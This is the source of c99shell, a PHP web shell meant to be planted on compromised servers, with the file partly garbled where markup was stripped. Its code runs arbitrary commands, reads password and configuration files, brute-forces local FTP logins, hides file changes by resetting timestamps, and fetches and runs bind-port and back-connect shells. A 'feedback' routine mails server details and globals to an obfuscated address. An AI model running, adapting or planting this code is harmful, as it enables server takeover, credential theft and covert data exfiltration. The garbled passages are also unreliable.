/____/ /____/ /_______ /|___| /\___ >____/____/ \_/ /\ \_______ \ /\ \_____ / \/ \/ \/ \/ \/ \/ \/ \/ _ _ __ _ _ _ | | | | / / (_) | | (_) | |__ _ _ | |/ / __ _ _ _______ _ __ | | ___ _ _ _ ___ | '_ \| | | | | \ / _` | |_ / _ \ '_ \| | / _ \| | | | |/ _ \ | |_) | |_| | | |\ \ (_| | |/ / __/ | | | |___| (_) | |_| | | __/ |_.__/ \__, | \_| \_/\__,_|_/___\___|_| |_\_____/\___/ \__,_|_|\___| __/ | |___/ * c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: KaizenLouie for PHP 7 * https://github.com/KaizenLouie/C99Shell-PHP7 ****************************************************************************************************** */ if (!function_exists("getmicrotime")) { function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } } error_reporting(5); @ignore_user_abort(true); $win = strtolower(substr(PHP_OS, 0, 3)) == "win"; define("starttime", getmicrotime()); if (get_magic_quotes_gpc()) { if (!function_exists("strips")) { function strips(&$arr, $k = "") { if (is_array($arr)) { foreach ($arr as $k => $v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } else { $arr = stripslashes($arr); } } } strips($GLOBALS); } $_REQUEST = array_merge($_COOKIE, $_GET, $_POST); foreach ($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } } $shver = "2.0 [PHP 7 Update] [25.02.2019]"; if (!empty($unset_surl)) { setcookie("c99sh_surl"); $surl = ""; } elseif (!empty($set_surl)) { $surl = $set_surl; setcookie("c99sh_surl", $surl); } else { $surl = $_REQUEST["c99sh_surl"]; } $surl_autofill_include = true; if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) { $include = "&"; foreach (explode("&", getenv("QUERY_STRING")) as $v) { $v = explode("=", $v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array( "http://", "https://", "ssl://", "ftp://", "\\\\" ) as $needle) { if (strpos($value, $needle) === 0) { $includestr .= urlencode($name) . "=" . urlencode($value) . "&"; } } } if ($_REQUEST["surl_autofill_include"]) { $includestr .= "surl_autofill_include=1&"; } } if (empty($surl)) { $surl = "?" . $includestr; } $surl = htmlspecialchars($surl); $timelimit = 0; $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array( "*" ); $login_txt = "Restricted area"; $accessdeniedmess = "c99shell v." . $shver . ": access denied"; $gzipencode = true; $updatenow = false; $c99sh_updateurl = "https://github.com/KaizenLouie/C99Shell-PHP7/"; $c99sh_sourcesurl = "https://github.com/KaizenLouie/C99Shell-PHP7/"; $filestealth = true; $donated_html = "
"; if ($tbl_struct) { echo " | Fields: "; foreach ($tbl_struct as $field) { $name = $field["Field"]; echo "» " . $name . " "; } echo " |
!C99Shell v. ! | |
---|---|
Software: uname -a: ", 1); ?> ", 1); } else { echo get_current_user(); } ?> Safe-mode: " . htmlspecialchars($b) . DIRECTORY_SEPARATOR . "";
$i++;
}
echo " ";
if (is_writable($d))
{
$wd = true;
$wdt = "[ ok ]";
echo "" . view_perms(fileperms($d)) . "";
}
else
{
$wd = false;
$wdt = "[ Read-Only ]";
echo "" . view_perms_color($d) . "";
}
if (is_callable("disk_free_space"))
{
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === false)
{
$free = 0;
}
if ($total === false)
{
$total = 0;
}
if ($free < 0)
{
$free = 0;
}
if ($total < 0)
{
$total = 0;
}
$used = $total - $free;
$free_percent = round(100 / ($total / $free) , 2);
echo " |
" . $donated_html . " |
";
if ($act == "")
{
$act = $dspact = "ls";
}
if ($act == "sql")
{
$sql_surl = $surl . "act=sql";
if ($sql_login)
{
$sql_surl .= "&sql_login=" . htmlspecialchars($sql_login);
}
if ($sql_passwd)
{
$sql_surl .= "&sql_passwd=" . htmlspecialchars($sql_passwd);
}
if ($sql_server)
{
$sql_surl .= "&sql_server=" . htmlspecialchars($sql_server);
}
if ($sql_port)
{
$sql_surl .= "&sql_port=" . htmlspecialchars($sql_port);
}
if ($sql_db)
{
$sql_surl .= "&sql_db=" . htmlspecialchars($sql_db);
}
$sql_surl .= "&"; ?>Attention! SQL-Manager is NOT ready module! Don't reports bugs.
"; } $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute: "; if (!win) { echo "This functions not work in Windows! "; } else { function c99ftpbrutecheck($host, $port, $timeout, $login, $pass, $sh, $fqb_onlywithsh) { if ($fqb_onlywithsh) { $true = (!in_array($sh, array( "/bin/false", "/sbin/nologin" ))); } else { $true = true; } if ($true) { $sock = @ftp_connect($host, $port, $timeout); if (@ftp_login($sock, $login, $pass)) { echo "Connected to " . $host . " with login \"" . $login . "\" and password \"" . $pass . "\". "; ob_flush(); return true; } } } if (!empty($submit)) { if (!is_numeric($fqb_lenght)) { $fqb_lenght = $nixpwdperpage; } $fp = fopen("/etc/passwd", "r"); if (!$fp) { echo "Can't get /etc/passwd for password-list."; } else { if ($fqb_logging) { if ($fqb_logfile) { $fqb_logfp = fopen($fqb_logfile, "w"); } else { $fqb_logfp = false; } $fqb_log = "FTP Quick Brute (called c99shell v. " . $shver . ") started at " . date("d.m.Y H:i:s") . "\r\n\r\n"; if ($fqb_logfile) { fwrite($fqb_logfp, $fqb_log, strlen($fqb_log)); } } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while (!feof($fp)) { $str = explode(":", fgets($fp, 2048)); if (c99ftpbrutecheck("localhost", 21, 1, $str[0], $str[0], $str[6], $fqb_onlywithsh)) { echo "Connected to " . getenv("SERVER_NAME") . " with login \"" . $str[0] . "\" and password \"" . $str[0] . "\" "; $fqb_log .= "Connected to " . getenv("SERVER_NAME") . " with login \"" . $str[0] . "\" and password \"" . $str[0] . "\", at " . date("d.m.Y H:i:s") . "\r\n"; if ($fqb_logfp) { fseek($fqb_logfp, 0); fwrite($fqb_logfp, $fqb_log, strlen($fqb_log)); } $success++; ob_flush(); } if ($i > $fqb_lenght) { break; } $i++; } if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; } $ftpquick_t = round(getmicrotime() - $ftpquick_st, 4); echo " Done! Total time (secs.): " . $ftpquick_t . " Total connections: " . $i . " Success.: " . $success . " Unsuccess.:" . ($i - $success) . " Connects per second: " . round($i / $ftpquick_t, 2) . " "; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): " . $ftpquick_t . "\r\nTotal connections: " . $i . "\r\nSuccess.: " . $success . "\r\nUnsuccess.:" . ($i - $success) . "\r\nConnects per second: " . round($i / $ftpquick_t, 2) . "\r\n"; if ($fqb_logfp) { fseek($fqb_logfp, 0); fwrite($fqb_logfp, $fqb_log, strlen($fqb_log)); } if ($fqb_logemail) { @mail($fqb_logemail, "c99shell v. " . $shver . " report", $fqb_log); } fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs . "c99sh_ftpquickbrute_" . date("d.m.Y_H_i_s") . ".log"; $logfile = str_replace("//", DIRECTORY_SEPARATOR, $logfile); echo ""; } } } if ($act == "d") { if (!is_dir($d)) { echo "
"; } } if ($act == "phpinfo") { @ob_clean(); phpinfo(); c99shexit(); } if ($act == "security") { echo " "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) { $nixpasswd = 0; } echo "*nix /etc/passwd: "; if (!is_numeric($nixpwd_s)) { $nixpwd_s = 0; } if (!is_numeric($nixpwd_e)) { $nixpwd_e = $nixpwdperpage; } echo " "; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "" . $uid["dir"] . ""; echo join(":", $uid) . " "; } $i++; } } else { echo " Get /etc/passwd "; } } else { $v = $_SERVER["WINDIR"] . "\repair\sam"; if (file_get_contents($v)) { echo "You can't crack winnt passwords(" . $v . ") "; } else { echo "You can crack winnt passwords. Download, and use lcp.crack+ ©. "; } } if (file_get_contents("/etc/userdomains")) { echo "View cpanel user-domains logs "; } if (file_get_contents("/var/cpanel/accounting.log")) { echo "View cpanel logs "; } if (file_get_contents("/usr/local/apache/conf/httpd.conf")) { echo "Apache configuration (httpd.conf) "; } if (file_get_contents("/etc/httpd.conf")) { echo "Apache configuration (httpd.conf) "; } if (file_get_contents("/etc/syslog.conf")) { echo "Syslog configuration (syslog.conf) "; } if (file_get_contents("/etc/motd")) { echo "Message Of The Day "; } if (file_get_contents("/etc/hosts")) { echo "Hosts "; } function displaysecinfo($name, $value) { if (!empty($value)) { if (!empty($name)) { $name = "" . $name . " - "; } echo $name . nl2br($value) . " "; } } displaysecinfo("OS Version?", myshellexec("cat /proc/version")); displaysecinfo("Kernel version?", myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name", myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)", myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?", myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM", myshellexec("free -m")); displaysecinfo("HDD space", myshellexec("df -h")); displaysecinfo("List of Attributes", myshellexec("lsattr -a")); displaysecinfo("Mount options ", myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?", myshellexec("which curl")); displaysecinfo("Is lynx installed?", myshellexec("which lynx")); displaysecinfo("Is links installed?", myshellexec("which links")); displaysecinfo("Is fetch installed?", myshellexec("which fetch")); displaysecinfo("Is GET installed?", myshellexec("which GET")); displaysecinfo("Is perl installed?", myshellexec("which perl")); displaysecinfo("Where is apache", myshellexec("whereis apache")); displaysecinfo("Where is perl?", myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf", myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf", myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf", myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf", myshellexec("locate psybnc.conf")); } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) { echo "Make File \"" . htmlspecialchars($mkfile) . "\": object alredy exists"; } elseif (!fopen($mkfile, "w")) { echo "Make File \"" . htmlspecialchars($mkfile) . "\": access denied"; } else { $act = "f"; $d = dirname($mkfile); if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $f = basename($mkfile); } } else { $act = $dspact = "ls"; } } if ($act == "encoder") { echo " "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls"; } } if ($act == "selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using c99shell v." . $shver . "!"; c99shexit(); } else { echo " "; } } if ($act == "feedback") { $suppmail = base64_decode("c2VjdXJlaGFzaHBoaWxpcHBpbmVzQGdtYWlsLmNvbQ=="); if (!empty($submit)) { $ticket = substr(md5(microtime() + rand(1, 1000)) , 0, 6); $body = "c99shell v." . $shver . " feedback #" . $ticket . "\nName: " . htmlspecialchars($fdbk_name) . "\nE-mail: " . htmlspecialchars($fdbk_email) . "\nMessage:\n" . htmlspecialchars($fdbk_body) . "\n\nIP: " . $REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents()); ob_clean(); echo $tmp; $body .= "\n" . "phpinfo(): " . $phpinfo . "\n" . "\$GLOBALS=" . base64_encode(serialize($GLOBALS)) . "\n"; } mail($suppmail, "c99shell v." . $shver . " feedback #" . $ticket, $body, "FROM: " . $suppmail); echo " "; if (empty($search_in)) { $search_in = $d; } if (empty($search_name)) { $search_name = "(.*)"; $search_name_regexp = 1; } if (empty($search_text_wwo)) { $search_text_regexp = 0; } if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array( "name" => $search_name, "name_regexp" => $search_name_regexp, "text" => $search_text, "text_regexp" => $search_text_regxp, "text_wwo" => $search_text_wwo, "text_cs" => $search_text_cs, "text_not" => $search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";", $search_in)); foreach ($in as $v) { c99fsearch($v); } $searchtime = round(getmicrotime() - $searchtime, 4); if (count($found) == 0) { echo "No files found!"; } else { $ls_arr = $found; $disp_fullpath = true; $act = "ls"; } } echo ""; if ($act == "ls") { $dspact = $act; echo " Search took " . $searchtime . " secs (" . $search_i_f . " files and " . $search_i_d . " folders, " . round(($search_i_f + $search_i_d) / $searchtime, 4) . " objects per second). "; } } if ($act == "chmod") { $mode = fileperms($d . $f); if (!$mode) { echo "Change file-mode with error: can't get current value."; } else { $form = true; if ($chmod_submit) { $octet = "0" . base_convert(($chmod_o["r"] ? 1 : 0) . ($chmod_o["w"] ? 1 : 0) . ($chmod_o["x"] ? 1 : 0) . ($chmod_g["r"] ? 1 : 0) . ($chmod_g["w"] ? 1 : 0) . ($chmod_g["x"] ? 1 : 0) . ($chmod_w["r"] ? 1 : 0) . ($chmod_w["w"] ? 1 : 0) . ($chmod_w["x"] ? 1 : 0) , 2, 8); if (chmod($d . $f, $octet)) { $act = "ls"; $form = false; $err = ""; } else { $err = "Can't chmod to " . $octet . "."; } } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (" . $d . $f . "), " . view_perms_color($d . $f) . " (" . substr(decoct(fileperms($d . $f)) , -4, 4) . ") " . ($err ? "Error: " . $err : "") . ""; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\\", DIRECTORY_SEPARATOR, $uploadpath); if (empty($uploadpath)) { $uploadpath = $d; } elseif (substr($uploadpath, -1) != "/") { $uploadpath .= "/"; } if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) { $destin = $uploadfile["name"]; } else { $destin = $userfilename; } if (!move_uploaded_file($uploadfile["tmp_name"], $uploadpath . $destin)) { $uploadmess .= "Error uploading file " . $uploadfile["name"] . " (can't copy \"" . $uploadfile["tmp_name"] . "\" to \"" . $uploadpath . $destin . "\"! "; } } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) { $destin = $uploadfilename; } else { $destin = explode("/", $destin); $destin = $destin[count($destin) - 1]; if (empty($destin)) { $i = 0; $b = ""; while (file_exists($uploadpath . $destin)) { if ($i > 0) { $b = "_" . $i; } $destin = "index" . $b . ".html"; $i++; } } } if ((!preg_match("http://", $uploadurl)) and (!preg_match("https://", $uploadurl)) and (!preg_match("ftp://", $uploadurl))) { echo "Incorect url! "; } else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime() - $st, 4); if (!$content) { $uploadmess .= "Can't download file! "; } else { if ($filestealth) { $stat = stat($uploadpath . $destin); } $fp = fopen($uploadpath . $destin, "w"); if (!$fp) { $uploadmess .= "Error writing to file " . htmlspecialchars($destin) . "! "; } else { fwrite($fp, $content, strlen($content)); fclose($fp); if ($filestealth) { touch($uploadpath . $destin, $stat[9], $stat[8]); } } } } } } if ($miniform) { echo "" . $uploadmess . ""; $act = "ls"; } else { echo "File upload: " . $uploadmess . ""; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = false; $result = fs_rmobj($v); if (!$result) { $delerr .= "Can't delete " . htmlspecialchars($v) . " "; } } if (!empty($delerr)) { echo "Deleting with errors: " . $delerr; } $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) { echo " "; } if ($copy_unset) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { $to = $d . basename($v); if (!fs_move_obj($v, $to)) { $psterr .= "Can't move " . $v . " to " . $to . "! "; } unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) { echo "Pasting with errors: " . $psterr; } $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path, -7, 7) == ".tar.gz") { $ext = ".tar.gz"; } else { $ext = ".tar.gz"; } if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; } $cmdline .= " " . $actarcbuff_path; $objects = array_merge($sess_data["copy"], $sess_data["cut"]); foreach ($objects as $v) { $v = str_replace("\\", DIRECTORY_SEPARATOR, $v); if (substr($v, 0, strlen($d)) == $d) { $v = basename($v); } if (is_dir($v)) { if (substr($v, -1) != DIRECTORY_SEPARATOR) { $v .= DIRECTORY_SEPARATOR; } $v .= "*"; } $cmdline .= " " . $v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) { $arcerr .= "Can't call archivator (" . htmlspecialchars(str2mini($cmdline, 60)) . ")! "; } $ret = str_replace("\r\n", "\n", $ret); $ret = explode("\n", $ret); if ($copy_unset) { foreach ($sess_data["copy"] as $k => $v) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { if (in_array($v, $ret)) { fs_rmobj($v); } unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) { echo "Archivation errors: " . $arcerr; } $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach ($sess_data["copy"] as $k => $v) { $to = $d . basename($v); if (!fs_copy_obj($v, $d)) { $psterr .= "Can't copy " . $v . " to " . $to . "! "; } if ($copy_unset) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { $to = $d . basename($v); if (!fs_move_obj($v, $d)) { $psterr .= "Can't move " . $v . " to " . $to . "! "; } unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) { echo "Pasting with errors: " . $psterr; } $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") { $act = "processes"; } elseif (trim($cmd) == "tasklist") { $act = "processes"; } else { @chdir($chdir); if (!empty($submit)) { echo "Result of execution this command: "; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret, "d", "w"); if ($cmd_txt) { $rows = count(explode("\r\n", $ret)) + 1; if ($rows < 10) { $rows = 10; } echo " "; } else { echo $ret . " "; } @chdir($olddir); } else { echo "Execution command"; if (empty($cmd_txt)) { $cmd_txt = true; } } echo ""; } } if ($act == "ls") { if (count($ls_arr) > 0) { $list = $ls_arr; } else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== false) { $list[] = $d . $o; } closedir($h); } else { } } if (count($list) == 0) { echo " "; if (count(array_merge($sess_data["copy"], $sess_data["cut"])) > 0 and ($usefsbuff)) { echo " "; } echo " "; echo ""; } } if ($act == "tools") { $bndportsrcs = array( "c99sh_bindport.pl" => array( "Using PERL", "perl %path %port" ) , "c99sh_bindport.c" => array( "Using C", "%path %port %pass" ) ); $bcsrcs = array( "c99sh_backconn.pl" => array( "Using PERL", "perl %path %host %port" ) , "c99sh_backconn.c" => array( "Using C", "%path %host %port" ) ); $dpsrcs = array( "c99sh_datapipe.pl" => array( "Using PERL", "perl %path %localport %remotehost %remoteport" ) , "c99sh_datapipe.c" => array( "Using C", "%path %localport %remoteport %remotehost" ) ); if (!is_array($bind)) { $bind = array(); } if (!is_array($bc)) { $bc = array(); } if (!is_array($datapipe)) { $datapipe = array(); } if (!is_numeric($bind["port"])) { $bind["port"] = $bindport_port; } if (empty($bind["pass"])) { $bind["pass"] = $bindport_pass; } if (empty($bc["host"])) { $bc["host"] = getenv("REMOTE_ADDR"); } if (!is_numeric($bc["port"])) { $bc["port"] = $bc_port; } if (empty($datapipe["remoteaddr"])) { $datapipe["remoteaddr"] = "irc.dalnet.ru:6667"; } if (!is_numeric($datapipe["localport"])) { $datapipe["localport"] = $datapipe_localport; } if (!empty($bindsubmit)) { echo "Result of binding port:"; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) { echo "Unknown file! "; } elseif (fsockopen(getenv("SERVER_ADDR") , $bind["port"], $errno, $errstr, 0.1)) { echo "Port alredy in use, select any other! "; } else { $w = explode(".", $bind["src"]); $ext = $w[count($w) - 1]; unset($w[count($w) - 1]); $srcpath = join(".", $w) . "." . rand(0, 999) . "." . $ext; $binpath = $tmpdir . join(".", $w) . rand(0, 999); if ($ext == "pl") { $binpath = $srcpath; } @unlink($srcpath); $fp = fopen($srcpath, "ab+"); if (!$fp) { echo "Can't write sources to \"" . $srcpath . "\"! "; } elseif (!$data = c99getsource($bind["src"])) { echo "Can't download sources!"; } else { fwrite($fp, $data, strlen($data)); fclose($fp); if ($ext == "c") { $retgcc = myshellexec("gcc -o " . $binpath . " " . $srcpath); @unlink($srcpath); } $v[1] = str_replace("%path", $binpath, $v[1]); $v[1] = str_replace("%port", $bind["port"], $v[1]); $v[1] = str_replace("%pass", $bind["pass"], $v[1]); $v[1] = str_replace("//", "/", $v[1]); $retbind = myshellexec($v[1] . " > /dev/null &"); sleep(5); $sock = fsockopen("localhost", $bind["port"], $errno, $errstr, 5); if (!$sock) { echo "I can't connect to localhost:" . $bind["port"] . "! I think you should configure your firewall."; } else { echo "Binding... ok! Connect to " . getenv("SERVER_ADDR") . ":" . $bind["port"] . "! You should use NetCat©, run \"nc -v " . getenv("SERVER_ADDR") . " " . $bind["port"] . "\"! "; } } if (!empty($bcsubmit)) { echo "Result of back connection: "; $v = $bcsrcs[$bc["src"]]; if (empty($v)) { echo "Unknown file! "; } else { $w = explode(".", $bc["src"]); $ext = $w[count($w) - 1]; unset($w[count($w) - 1]); $srcpath = join(".", $w) . "." . rand(0, 999) . "." . $ext; $binpath = $tmpdir . join(".", $w) . rand(0, 999); if ($ext == "pl") { $binpath = $srcpath; } @unlink($srcpath); $fp = fopen($srcpath, "ab+"); if (!$fp) { echo "Can't write sources to \"" . $srcpath . "\"! "; } elseif (!$data = c99getsource($bc["src"])) { echo "Can't download sources!"; } else { fwrite($fp, $data, strlen($data)); fclose($fp); if ($ext == "c") { $retgcc = myshellexec("gcc -o " . $binpath . " " . $srcpath); @unlink($srcpath); } $v[1] = str_replace("%path", $binpath, $v[1]); $v[1] = str_replace("%host", $bc["host"], $v[1]); $v[1] = str_replace("%port", $bc["port"], $v[1]); $v[1] = str_replace("//", "/", $v[1]); $retbind = myshellexec($v[1] . " > /dev/null &"); echo "Now script try connect to " . htmlspecialchars($bc["host"]) . ":" . htmlspecialchars($bc["port"]) . "... "; } } } if (!empty($dpsubmit)) { echo "Result of datapipe-running: "; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) { echo "Unknown file! "; } elseif (fsockopen(getenv("SERVER_ADDR") , $datapipe["port"], $errno, $errstr, 0.1)) { echo "Port alredy in use, select any other! "; } else { $srcpath = $tmpdir . $datapipe["src"]; $w = explode(".", $datapipe["src"]); $ext = $w[count($w) - 1]; unset($w[count($w) - 1]); $srcpath = join(".", $w) . "." . rand(0, 999) . "." . $ext; $binpath = $tmpdir . join(".", $w) . rand(0, 999); if ($ext == "pl") { $binpath = $srcpath; } @unlink($srcpath); $fp = fopen($srcpath, "ab+"); if (!$fp) { echo "Can't write sources to \"" . $srcpath . "\"! "; } elseif (!$data = c99getsource($datapipe["src"])) { echo "Can't download sources!"; } else { fwrite($fp, $data, strlen($data)); fclose($fp); if ($ext == "c") { $retgcc = myshellexec("gcc -o " . $binpath . " " . $srcpath); @unlink($srcpath); } list($datapipe["remotehost"], $datapipe["remoteport"]) = explode(":", $datapipe["remoteaddr"]); $v[1] = str_replace("%path", $binpath, $v[1]); $v[1] = str_replace("%localport", $datapipe["localport"], $v[1]); $v[1] = str_replace("%remotehost", $datapipe["remotehost"], $v[1]); $v[1] = str_replace("%remoteport", $datapipe["remoteport"], $v[1]); $v[1] = str_replace("//", "/", $v[1]); $retbind = myshellexec($v[1] . " > /dev/null &"); sleep(5); $sock = fsockopen("localhost", $datapipe["port"], $errno, $errstr, 5); if (!$sock) { echo "I can't connect to localhost:" . $datapipe["localport"] . "! I think you should configure your firewall."; } else { echo "Running datapipe... ok! Connect to " . getenv("SERVER_ADDR") . ":" . $datapipe["port"] . ", and you will connected to " . $datapipe["remoteaddr"] . "! You should use NetCat©, run \"nc -v " . getenv("SERVER_ADDR") . " " . $bind["port"] . "\"! "; } } ?>Binding port: Back connection: Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "! Datapipe: Note: sources will be downloaded from remote server.Processes: "; if (!$win) { $handler = "ps -aux" . ($grep ? " | grep '" . addslashes($grep) . "'" : ""); } else { $handler = "tasklist"; } $ret = myshellexec($handler); if (!$ret) { echo "Can't execute \"" . $handler . "\"!"; } else { if (empty($processes_sort)) { $processes_sort = $sort_default; } $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) { $parsesort[0] = 0; } $k = $parsesort[0]; if ($parsesort[1] != "a") { $y = ""; } else { $y = ""; } $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) { $sig = 9; } echo "Sending signal " . $sig . " to #" . $pid . "... "; if (posix_kill($pid, $sig)) { echo "OK."; } else { echo "ERROR."; } } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } $stack = explode("\n", $ret); $head = explode(" ", $stack[0]); unset($stack[0]); for ($i = 0;$i < count($head);$i++) { if ($i != $k) { $head[$i] = "" . $head[$i] . ""; } } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo " | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
" . $v . " | "; } echo "
Path | " . $d . $f . " |
Size | " . view_size(filesize($d . $f)) . " |
MD5 | " . md5_file($d . $f) . " |
Owner/Group | "; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo " |
Perms | " . view_perms_color($d . $f) . " |
Create time | " . date("d/m/Y H:i:s", filectime($d . $f)) . " |
Access time | " . date("d/m/Y H:i:s", fileatime($d . $f)) . " |
MODIFY time | " . date("d/m/Y H:i:s", filemtime($d . $f)) . " |
" . $a0 . " | " . $a1 . " | " . $a2 . " |
"; } elseif ($ft == "html") { if ($white) { @ob_clean(); } echo $r; if ($white) { c99shexit(); } } elseif ($ft == "txt") { echo "
" . htmlspecialchars($r) . ""; } elseif ($ft == "ini") { echo "
"; var_dump(parse_ini_file($d . $f, true)); echo ""; } elseif ($ft == "phpsess") { echo "
"; $v = explode("|", $r); echo $v[0] . ""; } elseif ($ft == "exe") { $ext = explode(".", $f); $c = count($ext) - 1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($exeftypes as $k => $v) { if (in_array($ext, $v)) { $rft = $k; break; } } $cmd = str_replace("%f%", $f, $rft); echo "Execute file:"; } elseif ($ft == "sdb") { echo "
"; var_dump(unserialize($v[1])); echo "
"; var_dump(unserialize(base64_decode($r))); echo ""; } elseif ($ft == "code") { if (preg_match("php" . "BB 2.(.*) auto-generated config file", $r)) { $arr = explode("\n", $r); if (count($arr == 18)) { include ($d . $f); echo "phpBB configuration is detected in this file!
:: Command execute :: | |
--[ c99shell v. maintained by KaizenLouie | C99Shell Github | Generation time: ]-- |